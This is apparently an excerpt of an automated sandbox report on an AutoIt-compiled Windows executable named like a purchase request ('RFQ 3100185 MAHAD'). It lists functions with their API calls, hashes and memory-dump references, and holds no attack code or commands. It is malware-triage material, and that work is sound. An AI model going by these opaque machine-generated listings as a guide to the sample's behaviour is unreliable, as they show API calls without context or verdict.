                                                            • Opcode ID: 5aebab0c24794800907081fc6cda33447152a38b6921af4cc5aa8bedf91701a7
                                                            • Instruction ID: dc3682603c3651310199203bb75fdfa9c3e5c852058858892e90daeb0ed3330f
                                                            • Opcode Fuzzy Hash: 5aebab0c24794800907081fc6cda33447152a38b6921af4cc5aa8bedf91701a7
                                                            • Instruction Fuzzy Hash: CC119171A02205FFDB049FA5DD95AAFBBADFF89304F14842DEA4297210D739AE44DB10
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 007EB498
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4AA
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4C0
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007EB4DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 2fa3a3b99a886fba577e1a90cbbfb57f4a4d8cd623b3cf2cd3fb60a3024b7428
                                                            • Instruction ID: 69fc412dbc3374113d6bae958c5623e35f5e36118f405dd1188117405e9f689e
                                                            • Opcode Fuzzy Hash: 2fa3a3b99a886fba577e1a90cbbfb57f4a4d8cd623b3cf2cd3fb60a3024b7428
                                                            • Instruction Fuzzy Hash: 74115A7A901258FFEB11DFA9C885E9EBBB4FB09700F204091E604BB290D771AE10DB94
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 007CB5A5
                                                            • GetClientRect.USER32(?,?), ref: 0082E69A
                                                            • GetCursorPos.USER32(?), ref: 0082E6A4
                                                            • ScreenToClient.USER32(?,?), ref: 0082E6AF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 910fdf86191054b071df2cc213c561c1241028dc7ed97446c9294439e635141d
                                                            • Instruction ID: 4da75cc1e2815872e3a2a6c209d2b6cbde1474730e27ba34cc81858d856536b0
                                                            • Opcode Fuzzy Hash: 910fdf86191054b071df2cc213c561c1241028dc7ed97446c9294439e635141d
                                                            • Instruction Fuzzy Hash: AD110A31900129FBCB10DFA8EC4ADEE77B9FB59305F100859F911E7140D734AA96CBA5
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 007F7352
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 007F7385
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007F739B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007F73A2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: d36bcdac4d5c2a69aad1652aa083882a2fa58c074dbe5a93dc00b490003fa560
                                                            • Instruction ID: e244ef938480c0aa2dda53fd526d9026069d0d935997b9fea6e36358eb687899
                                                            • Opcode Fuzzy Hash: d36bcdac4d5c2a69aad1652aa083882a2fa58c074dbe5a93dc00b490003fa560
                                                            • Instruction Fuzzy Hash: FE114472A04249BFC7019BACEC09AAE7BADBF84311F104315F925D33A6D274CD0097A1
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                            • GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateMessageObjectSendStockWindow
                                                            • String ID:
                                                            • API String ID: 3970641297-0
                                                            • Opcode ID: 390056c8109a0fa597ccb52fe7340d0076e2c10d21d71bbde20f9c25d28a3b68
                                                            • Instruction ID: 87572072b070b479fcfef2828cc5656334ce3bbe43e000bbd668e4b5e7c62b00
                                                            • Opcode Fuzzy Hash: 390056c8109a0fa597ccb52fe7340d0076e2c10d21d71bbde20f9c25d28a3b68
                                                            • Instruction Fuzzy Hash: 0C11C0B210160DBFEF224FA4EC55EEABB6AFF59364F090129FA1452150C735DC60DBA0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                            • Instruction ID: 25268f7bd50c852e785c688e03b5d891f5b288d10dc94b872c309cb05e2bce95
                                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                            • Instruction Fuzzy Hash: 14014B3600118EFBCF125E95DC068EE3F23BB1C354B588455FA2859031D33ACAB1AB81
                                                            APIs
                                                              • Part of subcall function 007D7A0D: __getptd_noexit.LIBCMT ref: 007D7A0E
                                                            • __lock.LIBCMT ref: 007D748F
                                                            • InterlockedDecrement.KERNEL32(?), ref: 007D74AC
                                                            • _free.LIBCMT ref: 007D74BF
                                                            • InterlockedIncrement.KERNEL32(01254548), ref: 007D74D7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                            • String ID:
                                                            • API String ID: 2704283638-0
                                                            • Opcode ID: 842471e9ae68a206e087e36370c488f19aa931504e1249d91754a9d940907fac
                                                            • Instruction ID: 957ec165abdd1a3cce1e1a299b3c23445f9a81fef271f035299746c9df8a775d
                                                            • Opcode Fuzzy Hash: 842471e9ae68a206e087e36370c488f19aa931504e1249d91754a9d940907fac
                                                            • Instruction Fuzzy Hash: 1701AD3290A661EBCB1BAF64A50A75DBB70BB04710F16400BF814B7780EB2C6900CFD2
                                                            APIs
                                                            • __lock.LIBCMT ref: 007D7AD8
                                                              • Part of subcall function 007D7CF4: __mtinitlocknum.LIBCMT ref: 007D7D06
                                                              • Part of subcall function 007D7CF4: EnterCriticalSection.KERNEL32(00000000,?,007D7ADD,0000000D), ref: 007D7D1F
                                                            • InterlockedIncrement.KERNEL32(?), ref: 007D7AE5
                                                            • __lock.LIBCMT ref: 007D7AF9
                                                            • ___addlocaleref.LIBCMT ref: 007D7B17
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 1687444384-0
                                                            • Opcode ID: 9ec727c9601313daeaa18548bbb920d32eee6807b79597eb74415f35a6bd70b4
                                                            • Instruction ID: 6eb74a424bd1fc7de145f91f77543af5ec3e5adba68e213a55e2875cf9d20afa
                                                            • Opcode Fuzzy Hash: 9ec727c9601313daeaa18548bbb920d32eee6807b79597eb74415f35a6bd70b4
                                                            • Instruction Fuzzy Hash: DA015B71405B00DED7209F75D90A74AB7F0FF50321F20890FE49A967A0DBB8A644CB51
                                                            APIs
                                                            • _memset.LIBCMT ref: 0081E33D
                                                            • _memset.LIBCMT ref: 0081E34C
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00873D00,00873D44), ref: 0081E37B
                                                            • CloseHandle.KERNEL32 ref: 0081E38D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: aefb04c4e37df8c71d9ef470e3a22eaecd64efc092f366b60877e62cc51052ee
                                                            • Instruction ID: 5db8b614da5b17a76dcfb49f093f3ef5ccdd407d3243b46375129cefcfc244ea
                                                            • Opcode Fuzzy Hash: aefb04c4e37df8c71d9ef470e3a22eaecd64efc092f366b60877e62cc51052ee
                                                            • Instruction Fuzzy Hash: C1F05EF1640314BAE2201BA0AC4DF7B7E6CFB05754F004422BF0CE62A6D375DE40A6AA
                                                            APIs
                                                              • Part of subcall function 007CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                              • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                              • Part of subcall function 007CAF83: BeginPath.GDI32(?), ref: 007CB009
                                                              • Part of subcall function 007CAF83: SelectObject.GDI32(?,00000000), ref: 007CB033
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0081EA8E
                                                            • LineTo.GDI32(00000000,?,?), ref: 0081EA9B
                                                            • EndPath.GDI32(00000000), ref: 0081EAAB
                                                            • StrokePath.GDI32(00000000), ref: 0081EAB9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: b1060f702e9796fc32886638c6beb12f6ba83b0c14e037114971ee14d1264c99
                                                            • Instruction ID: 932a97ec6e498e4f285dbacd7a4b43723bce1fda804c1a35ba574a3c044f76bb
                                                            • Opcode Fuzzy Hash: b1060f702e9796fc32886638c6beb12f6ba83b0c14e037114971ee14d1264c99
                                                            • Instruction Fuzzy Hash: 67F05E31045669BBDF129FA4AC0DFCE3F29BF56711F044105FE11610F187B49595CB95
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007EC84A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 007EC85D
                                                            • GetCurrentThreadId.KERNEL32 ref: 007EC864
                                                            • AttachThreadInput.USER32(00000000), ref: 007EC86B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: 70108fb4d450982277aa824254bfb983a809fb8801f55ecdc6d744ce00d1de28
                                                            • Instruction ID: 6eb5e6ec0d7e1629a4cbb86dd00aa46fdd49b9808ef638198dfb1696bc63dd1e
                                                            • Opcode Fuzzy Hash: 70108fb4d450982277aa824254bfb983a809fb8801f55ecdc6d744ce00d1de28
                                                            • Instruction Fuzzy Hash: 93E03975142368BADB211BA2AC0EEDB7F2CEF5A7A1F008421B60984461D7B58581DBE0
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 007EB0D6
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,007EAC9D), ref: 007EB0DD
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007EAC9D), ref: 007EB0EA
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,007EAC9D), ref: 007EB0F1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: c2c2c889539da045a354be44ba63de1586b819e4ca805ea8053ed52d79e72215
                                                            • Instruction ID: 39b2904e94705f80198d473b33e00bdd9354bd70f232609cb84154e7e8b0e48e
                                                            • Opcode Fuzzy Hash: c2c2c889539da045a354be44ba63de1586b819e4ca805ea8053ed52d79e72215
                                                            • Instruction Fuzzy Hash: FDE086327013119BD7201FB26D0CB4B3BACFF95B91F018C18F241D6040EB389401CB60
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 007CB496
                                                            • SetTextColor.GDI32(?,000000FF), ref: 007CB4A0
                                                            • SetBkMode.GDI32(?,00000001), ref: 007CB4B5
                                                            • GetStockObject.GDI32(00000005), ref: 007CB4BD
                                                            • GetWindowDC.USER32(?,00000000), ref: 0082DE2B
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0082DE38
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0082DE51
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0082DE6A
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0082DE8A
                                                            • ReleaseDC.USER32(?,00000000), ref: 0082DE95
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: d7482d7758285fea69af749cb3607749b1dc95fdefbf88aab379d8a8fa58c3f4
                                                            • Instruction ID: 13d92a629b625c4c0fbe11cbd3fc71a44a977f96f316aa037eba85098b5ada16
                                                            • Opcode Fuzzy Hash: d7482d7758285fea69af749cb3607749b1dc95fdefbf88aab379d8a8fa58c3f4
                                                            • Instruction Fuzzy Hash: 80E0ED31504380EBDB215B64BC09BDC7F21FB91335F14CA6AF669980E2C7714581DB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 4ea49a3189e872a0c0b0703bc02956be26aadef1ef72727cf8135b6686cce2b4
                                                            • Instruction ID: 1bc170269357537238439d87ce2291ea675f446fc77c5e0d504f9c2c9dcca178
                                                            • Opcode Fuzzy Hash: 4ea49a3189e872a0c0b0703bc02956be26aadef1ef72727cf8135b6686cce2b4
                                                            • Instruction Fuzzy Hash: 67E04FB1100304EFDB005F70E84DA2D7BA9FB9C350F11CC19FC6A87211DB7998418B90
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007EB2DF
                                                            • UnloadUserProfile.USERENV(?,?), ref: 007EB2EB
                                                            • CloseHandle.KERNEL32(?), ref: 007EB2F4
                                                            • CloseHandle.KERNEL32(?), ref: 007EB2FC
                                                              • Part of subcall function 007EAB24: GetProcessHeap.KERNEL32(00000000,?,007EA848), ref: 007EAB2B
                                                              • Part of subcall function 007EAB24: HeapFree.KERNEL32(00000000), ref: 007EAB32
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 51c32b6120dd65b6309ada83a8a188ba1136ecec74b6f9dfae030e6ed0866bf3
                                                            • Instruction ID: dfa242eca8271ea053db544ef6d5e4f1d8d18d796e73fd2ffcbb790937a91966
                                                            • Opcode Fuzzy Hash: 51c32b6120dd65b6309ada83a8a188ba1136ecec74b6f9dfae030e6ed0866bf3
                                                            • Instruction Fuzzy Hash: BAE0BF36104105FBCB012B95EC08859FB76FFC83213108621F61581571DB32A871EB91
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 2a7b3170d2ecdcfc9efc1e91f4eb6792ff0894281b091c41ce66e472f2be52f1
                                                            • Instruction ID: 1ff9d2d38603c789ea39901346b97a83ec2861f21f0e065bf866ceadf7b97216
                                                            • Opcode Fuzzy Hash: 2a7b3170d2ecdcfc9efc1e91f4eb6792ff0894281b091c41ce66e472f2be52f1
                                                            • Instruction Fuzzy Hash: 25E046B1500300EFDB005F70E84DA2D7BA9FB9C350F118C19F96E8B211EBB9A8018B90
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 007EDEAA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: 8c430d86b81d81c1f430aca408b895c329ffac2f229d5429541b5f135a6785af
                                                            • Instruction ID: f89a0626fd3ea22858e1e593dea8603d041308a05573b03fd2009c60f892d453
                                                            • Opcode Fuzzy Hash: 8c430d86b81d81c1f430aca408b895c329ffac2f229d5429541b5f135a6785af
                                                            • Instruction Fuzzy Hash: 5D912570601601AFDB24CF65C888F6AB7B9FF49710F10896EF95ACB291DB74E941CB60
                                                            APIs
                                                              • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • __wcsnicmp.LIBCMT ref: 007FDEFD
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007FDFC6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
